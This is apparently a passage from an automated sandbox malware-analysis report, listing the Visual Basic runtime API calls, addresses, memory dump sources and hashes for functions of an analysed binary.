                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,?,Function_000032B6), ref: 0041E7A1
                                                                                    • __vbaStrToUnicode.MSVBVM60(0042C0BC,?,?,?,?,?,?,Function_000032B6), ref: 0041E7AF
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 0041E7B8
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000,00000000,00000000,?,?,?,?,?,Function_000032B6), ref: 0041E7D3
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000,00000000,?,?,?,?,?,Function_000032B6), ref: 0041E7E4
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,?,Function_000032B6), ref: 0041E7F5
                                                                                    • __vbaStrToUnicode.MSVBVM60(0042C0BC,?,?,?,?,?,?,Function_000032B6), ref: 0041E803
                                                                                    • __vbaStrToUnicode.MSVBVM60(00000000,?,?,?,?,?,?,Function_000032B6), ref: 0041E811
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,Function_000032B6), ref: 0041E827
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$AnsiErrorUnicode$FreeSystem$ChkstkList
                                                                                    • String ID:
                                                                                    • API String ID: 3861917509-0
                                                                                    • Opcode ID: 85e4f07598a0960e0cabd3e4e7a1ed0f25af75eec3b758aa50ec09c6dfd0cf73
                                                                                    • Instruction ID: a92ad539ecbf6efebda2d3259df1282ada01a5d6d20107e5edffdf3838fad138
                                                                                    • Opcode Fuzzy Hash: 85e4f07598a0960e0cabd3e4e7a1ed0f25af75eec3b758aa50ec09c6dfd0cf73
                                                                                    • Instruction Fuzzy Hash: 61310CB5900208EFCB00DFE4DA88FDEBBB8EB48314F108259F501B7290C7789A44CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00415830 Relevance: 18.1, APIs: 12, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(0040CEB3,004032B6,0040CEB3,?,?,?,00000000,004032B6), ref: 0041584E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,0040CEB3,004032B6,0040CEB3), ref: 0041587E
                                                                                    • #648.MSVBVM60(0000000A), ref: 0041589D
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004158AA
                                                                                    • __vbaFileOpen.MSVBVM60(00000120,000000FF,?), ref: 004158C9
                                                                                    • #570.MSVBVM60(?), ref: 004158DB
                                                                                    • #525.MSVBVM60(00000000), ref: 004158E2
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004158ED
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,?), ref: 00415905
                                                                                    • __vbaFileClose.MSVBVM60(?), ref: 00415917
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041592A
                                                                                    • __vbaFreeStr.MSVBVM60(0041595E), ref: 00415957
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$FileFree$#525#570#648ChkstkCloseCopyErrorGet3MoveOpen
                                                                                    • String ID:
                                                                                    • API String ID: 947554498-0
                                                                                    • Opcode ID: a4844d169c03657195c66291a7f0840fb89a4f1fe1073a2b47ba6fd526ef2949
                                                                                    • Instruction ID: 9d0290c9668b0b97bc5e056eca09828b1551f52cd0b7d0ae963dc3f7ea44dd8b
                                                                                    • Opcode Fuzzy Hash: a4844d169c03657195c66291a7f0840fb89a4f1fe1073a2b47ba6fd526ef2949
                                                                                    • Instruction Fuzzy Hash: A0314BB5C00248EBDB00DFD4DA48BDEBBB8FF08714F208159E611B72A0DB795A48CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405037 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 130COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040FF4E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0040FF95
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 0040FFC6
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004082BC,0000004C), ref: 0040FFF9
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 00410038
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410081
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004082BC,00000040), ref: 004100B9
                                                                                    • __vbaLateIdCall.MSVBVM60(?,60030004,00000000), ref: 004100DC
                                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004100EF
                                                                                    • __vbaCastObj.MSVBVM60(00000000,004077C4), ref: 00410112
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041011D
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000730), ref: 00410150
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0041016B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckFreeHresult$CallCastChkstkErrorLateList
                                                                                    • String ID: [
                                                                                    • API String ID: 269068952-784033777
                                                                                    • Opcode ID: 5016deb1a59da2f2e0196918561fb49243e5c565f0178785edbf7654f715f660
                                                                                    • Instruction ID: 16c54425a3ce120e5e2135e3149755cc9251ea993a7cd341aaf2995901e8571e
                                                                                    • Opcode Fuzzy Hash: 5016deb1a59da2f2e0196918561fb49243e5c565f0178785edbf7654f715f660
                                                                                    • Instruction Fuzzy Hash: 61512A75900608EBDB10DFA4D948BDEBBB4FF08704F20825DF515AB291D7799A84CFA8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00419626 Relevance: 16.6, APIs: 11, Instructions: 114COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaAryLock.MSVBVM60(00000000,?), ref: 00419650
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00419688
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 004196A2
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 004196C9
                                                                                    • __vbaAryUnlock.MSVBVM60(00000000), ref: 004196D3
                                                                                    • __vbaStrComp.MSVBVM60(00000001,00000000,?), ref: 004196E5
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004196FA
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00419745
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041975F
                                                                                    • __vbaCopyBytes.MSVBVM60(00000010,00000000,?), ref: 0041977E
                                                                                    • __vbaErase.MSVBVM60(00000000,?), ref: 004197AC
                                                                                    • __vbaErase.MSVBVM60(00000000,?), ref: 004197BF
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00419803), ref: 004197F0
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004197FC
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 0041981A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$BoundsGenerate$DestructErase$BytesCompCopyFreeLockMoveOverflowUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 2458773320-0
                                                                                    • Opcode ID: 385b518716c5d96581d354086ed4219ffaaac5b28a4e957e8dddbad5aed777d6
                                                                                    • Instruction ID: b4eaaf3b6912c0b715553f9d0a6d665ec823eac17e865164621a45f09c466846
                                                                                    • Opcode Fuzzy Hash: 385b518716c5d96581d354086ed4219ffaaac5b28a4e957e8dddbad5aed777d6
                                                                                    • Instruction Fuzzy Hash: E8510874A10109EFDB08DF94DAA8BEDB7B5FF44301F208199E516AB290CB74AD81CF55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004295B0 Relevance: 16.6, APIs: 11, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 004295F7
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 00429604
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 00429611
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0042961E
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00429629
                                                                                    • __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,00000000,?,00000000), ref: 0042963D
                                                                                    • __vbaStrToUnicode.MSVBVM60(004032B6,?,?,00000000,?,00000000,?,00000000), ref: 00429647
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000,?,00000000), ref: 0042964E
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000,?,00000000), ref: 00429655
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004032B6), ref: 0042965A
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000000,?,00000000,?,00000000), ref: 00429675
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$AnsiUnicode$ErrorFreeListSystem
                                                                                    • String ID:
                                                                                    • API String ID: 3859701107-0
                                                                                    • Opcode ID: 5c61e922defa331cc4ce072f563674e95d7f8f498ef2ac34effc3ba57cb8711b
                                                                                    • Instruction ID: 594d62947b0162dfde37296f4cb3f61c41ad37821fc0585372e9270dc8f55869
                                                                                    • Opcode Fuzzy Hash: 5c61e922defa331cc4ce072f563674e95d7f8f498ef2ac34effc3ba57cb8711b
                                                                                    • Instruction Fuzzy Hash: D031B6B5D10219AFCB04DFA4CD85DEFBBBCEB8C700F10455AE901A7250D674A9058FB4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040DAA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0040DABE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 0040DB05
                                                                                    • __vbaStrCat.MSVBVM60( RU,00000000,?,?,?,?,Function_000032B6), ref: 0040DB1E
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 0040DB29
                                                                                      • Part of subcall function 0042A090: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
                                                                                      • Part of subcall function 0042A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
                                                                                      • Part of subcall function 0042A090: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
                                                                                      • Part of subcall function 0042A090: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7
                                                                                    • __vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000,?,?,?,?,Function_000032B6), ref: 0040DB4A
                                                                                    • __vbaStrCat.MSVBVM60( RU,00000000,?,?,?,?,Function_000032B6), ref: 0040DB63
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 0040DB6E
                                                                                    • __vbaFreeStr.MSVBVM60(80000002,00000000,00000000,00000000,?,?,?,?,Function_000032B6), ref: 0040DB8F
                                                                                      • Part of subcall function 00415FD0: __vbaSetSystemError.MSVBVM60(00000000,0040DBA1,?,?,?,?,Function_000032B6), ref: 00415FE5
                                                                                      • Part of subcall function 00416100: __vbaSetSystemError.MSVBVM60(00000000,0040DBAD,?,?,?,?,Function_000032B6), ref: 00416115
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$Free$System$AnsiCopyUnicode$ChkstkMove$BstrList
                                                                                    • String ID: RU
                                                                                    • API String ID: 279242310-1417676127
                                                                                    • Opcode ID: 834666a230e91adafad132ac9b958fc5a9d9edbf53aecaab06e1bd8c04ae2b97
                                                                                    • Instruction ID: a5e5539ec0bd47771e5bba15ffd7383eda2de6e9d9ac7ceec32cc9b4ad75a0a3
                                                                                    • Opcode Fuzzy Hash: 834666a230e91adafad132ac9b958fc5a9d9edbf53aecaab06e1bd8c04ae2b97
                                                                                    • Instruction Fuzzy Hash: A7312A71600244EFDB00DF94DE4AF9E7BB8FB48704F60816DF505A72A0CB786A44CBA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00429070 Relevance: 15.1, APIs: 10, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0042908E
                                                                                    • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,?,Function_000032B6), ref: 004290D4
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 004290E3
                                                                                    • __vbaVarVargNofree.MSVBVM60(?,?,?,?,Function_000032B6), ref: 004290F6
                                                                                    • __vbaStrErrVarCopy.MSVBVM60(00000000,?,?,?,?,Function_000032B6), ref: 004290FD
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,Function_000032B6), ref: 00429108
                                                                                    • __vbaChkstk.MSVBVM60 ref: 00429120
                                                                                    • __vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 00429146
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 00429152
                                                                                    • __vbaFreeObj.MSVBVM60(0042917A,?,?,?,?,?,?,Function_000032B6), ref: 00429173
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$ChkstkFree$AddrefCopyErrorEventMoveNofreeRaiseVarg
                                                                                    • String ID:
                                                                                    • API String ID: 3705209087-0
                                                                                    • Opcode ID: 81121c5470669a7c16739aa6be5f71145eac563f112db7cdea347d1295e6e5d1
                                                                                    • Instruction ID: f347cf2a893cf853362eea099f11493267eac5c9acb7e4d5a4fc20cfa02f8f68
                                                                                    • Opcode Fuzzy Hash: 81121c5470669a7c16739aa6be5f71145eac563f112db7cdea347d1295e6e5d1
                                                                                    • Instruction Fuzzy Hash: 70310975900209DFDB00DF94C989BDEBBB4FF08314F108269F915A7390C774AA85CB94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041D5B8 Relevance: 13.5, APIs: 9, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041D5D9
                                                                                    • __vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041D5E1
                                                                                    • __vbaVarSetObjAddref.MSVBVM60(?,00000000), ref: 0041D5E9
                                                                                    • __vbaExitProc.MSVBVM60 ref: 0041D5EB
                                                                                    • __vbaFreeVar.MSVBVM60(0041D664), ref: 0041D64B
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041D650
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041D658
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0041D661
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 0041D680
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$AddrefFree$DestructErrorExitOverflowProc
                                                                                    • String ID:
                                                                                    • API String ID: 2473607959-0
                                                                                    • Opcode ID: cb108ea1c80cccade74e7f213af0347de610002038ec2a835772024163612513
                                                                                    • Instruction ID: 9264f18109a120e7ce87413fc4b53469814454bba0ef014958fd4b23833393e4
                                                                                    • Opcode Fuzzy Hash: cb108ea1c80cccade74e7f213af0347de610002038ec2a835772024163612513
                                                                                    • Instruction Fuzzy Hash: A7F04F71C50218AFDB04EBA0ED55BED7B34EF48700F508426E506A70B4EF786A85CFA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00428CC0 Relevance: 12.1, APIs: 8, Instructions: 113COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,00402F88,?,?,?,?,?,00000000,004032B6), ref: 00428CF6
                                                                                    • __vbaExitProc.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00428D27
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00428D42
                                                                                    • __vbaOnError.MSVBVM60(00000001), ref: 00428D95
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007BC), ref: 00428DBA
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A184,00000094), ref: 00428DE4
                                                                                    • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00428DF3
                                                                                    • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,Function_000032B6), ref: 00428DF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$CheckExitHresultProc$FreeOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1609803294-0
                                                                                    • Opcode ID: 21ddd133c35a2055249bfdced58ced3040ae018b58796bb9847fdddddb7096ca
                                                                                    • Instruction ID: 288edfe35e9085eef6f99ea30057e2506a503dbf0f3c7e11b8dd8825ff45c2f6
                                                                                    • Opcode Fuzzy Hash: 21ddd133c35a2055249bfdced58ced3040ae018b58796bb9847fdddddb7096ca
                                                                                    • Instruction Fuzzy Hash: 35417E75E01218EFC710DF98D948A9DBBB8FF58B10F50416BF805B7290CB7859418BA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00404FDC Relevance: 12.1, APIs: 8, Instructions: 84COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __vbaOnError.MSVBVM60(00000001), ref: 0040D56C
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34), ref: 0040D584
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D5A7
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,00000040), ref: 0040D5CB
                                                                                    • __vbaObjSet.MSVBVM60(?,?), ref: 0040D5E2
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,0000000C), ref: 0040D5F8
                                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040D608
                                                                                    • __vbaExitProc.MSVBVM60 ref: 0040D611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckHresult$ErrorExitFreeListNew2Proc
                                                                                    • String ID:
                                                                                    • API String ID: 306309671-0
                                                                                    • Opcode ID: ca2ad210dbadf10d8339a2c6302259c2d85a358f52ad595904c40038edc4eebe
                                                                                    • Instruction ID: d803e8ae1a74f1de2285c6eb7d8813a05e13e9447d060414ac64bef4c706b468
                                                                                    • Opcode Fuzzy Hash: ca2ad210dbadf10d8339a2c6302259c2d85a358f52ad595904c40038edc4eebe
                                                                                    • Instruction Fuzzy Hash: CB318E70900218FFDB10DF95DD89E9EBBB8FF08B04F10456AF545B7290D77899448BA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004250D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _adj_fdiv_m64.MSVBVM60(660E6C4A,00000000), ref: 0042510E
                                                                                    • __vbaR8IntI4.MSVBVM60(x.@,660E6C4A,00000000), ref: 00425122
                                                                                    • _adj_fdiv_m64.MSVBVM60 ref: 00425167
                                                                                    • __vbaR8IntI4.MSVBVM60 ref: 00425172
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
